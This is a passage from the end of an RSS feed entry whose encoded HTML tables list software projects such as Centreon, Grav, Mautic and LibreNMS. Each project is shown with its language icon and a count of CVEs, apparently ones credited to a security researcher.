      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://uxwing.com/wp-content/themes/uxwing/download/brands-and-social-media/ruby-programming-language-icon.png&amp;#34; width=&amp;#34;20&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 92&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 81&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 14&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;br/ /&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.sourcecodester.com/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/sourcecodester.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;SourceCodester&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.mercusys.com.br/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/mercusys.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;Mercusys&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/SCADA-LTS/Scada-LTS&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/scada-lts.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;SCADA-LTS&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://cdn-icons-png.flaticon.com/512/9694/9694712.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://cdn-icons-png.flaticon.com/512/226/226777.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 3&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 2&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 13&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;br/ /&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/centreon/centreon&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/centreon.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;Centreon&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/getgrav/grav&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/grav.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;Grav&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/indico/indico&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/indico.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;Indico&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://cdn.iconscout.com/icon/free/png-256/free-python-logo-icon-download-in-svg-png-gif-file-formats--technology-social-media-vol-5-pack-logos-icons-3030224.png?f=webp&amp;#34; width=&amp;#34;28&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 12&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 6&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 1&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/mautic/mautic&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/mautic.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;Mautic&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/novosga/novosga&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/NovoSGA.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;NovoSGA&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/librenms/librenms&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/LibreNMS.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;LibreNMS&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 1&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 2&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 3&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/projeto-siga/siga&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/siga.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;SIGA&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://cdn-icons-png.flaticon.com/512/226/226777.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 1&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Jan 0001 00:00:00 &#43;0000</pubDate>
      </item>
    
  </channel>
</rss>
